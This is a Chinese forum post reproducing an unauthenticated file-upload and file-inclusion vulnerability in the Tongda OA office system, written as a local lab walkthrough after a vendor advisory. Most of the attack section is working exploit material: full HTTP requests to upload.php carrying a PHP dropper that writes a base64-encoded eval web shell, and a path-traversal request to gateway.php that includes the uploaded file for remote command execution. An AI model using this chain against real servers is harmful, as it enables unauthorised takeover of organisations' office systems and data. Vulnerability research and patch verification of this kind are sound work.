|
|
[md]通达OA是由北京通达信科科技有限公司开发的一款办公系统,近日通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到测试。
测试者可在未授权的情况下可上传图片Shell文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且测试者无须登陆认证即可完成测试。
![文件上传与包含][1]
### 搭建本地环境
通达OA获取:
链接:https://pan.baidu.com/s/1QFAoLxj9pD1bnnq3f4I8lg
提取码:ousi
**包含漏洞的两个文件:**
文件上传:`webroot\ispirit\im\upload.php`
文件包含:`webroot\ispirit\interface\gateway.php`
### 漏洞复现
在没有登录的情况下上传文件
我们直接访问
http://localhost//ispirit/im/upload.php
提示:`-ERR 用户未登陆`
ok,我们在burp中构造数据包
```bash
POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.174.159:80
Content-Length: 602
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryBwVAwV3O4sifyhr3
Content-Disposition: form-data; name="UPLOAD_MODE"
2
------WebKitFormBoundaryBwVAwV3O4sifyhr3
Content-Disposition: form-data; name="P"
------WebKitFormBoundaryBwVAwV3O4sifyhr3
Content-Disposition: form-data; name="DEST_UID"
1
------WebKitFormBoundaryBwVAwV3O4sifyhr3
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg
<?php
$fp = fopen('bbskali.php', 'w');
$a = base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==");
fwrite($fp, $a);
fclose($fp);
?>
------WebKitFormBoundaryBwVAwV3O4sifyhr3--
```
这里我构造了一个名为bbskali.php的图片一句话Shell。但是上传之后格式为jpg格式。
![成功上传图片Shell][2]
如上图,我们成功上传图片。位置为`2005/339702047.jpg`
通达OA默认上传位置:`myoa/attach/im`则上面的完整路劲为:`myoa/attach/im/2005/339702047.jpg`
![][3]
### 通过文件包含解析出一句话
```bash
POST /ispirit/interface/gateway.php HTTP/1.1
Host: 192.168.123.209
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
json={"url":"/general/../../attach/im/2005/339702047.jpg"}
```
![][4]
解析为php一句话
![][5]
[1]: https://blog.bbskali.cn/usr/uploads/2020/05/3886653494.jpg
[2]: https://blog.bbskali.cn/usr/uploads/2020/05/1352534430.png
[3]: https://blog.bbskali.cn/usr/uploads/2020/05/1815332524.jpg
[4]: https://blog.bbskali.cn/usr/uploads/2020/05/2468975976.png
[5]: https://blog.bbskali.cn/usr/uploads/2020/05/238811322.jpg
[/md] |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
×
|
|
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
|
[复制链接]
发表于 2020-5-11 11:00:38
发表于 2020-5-12 17:43:42
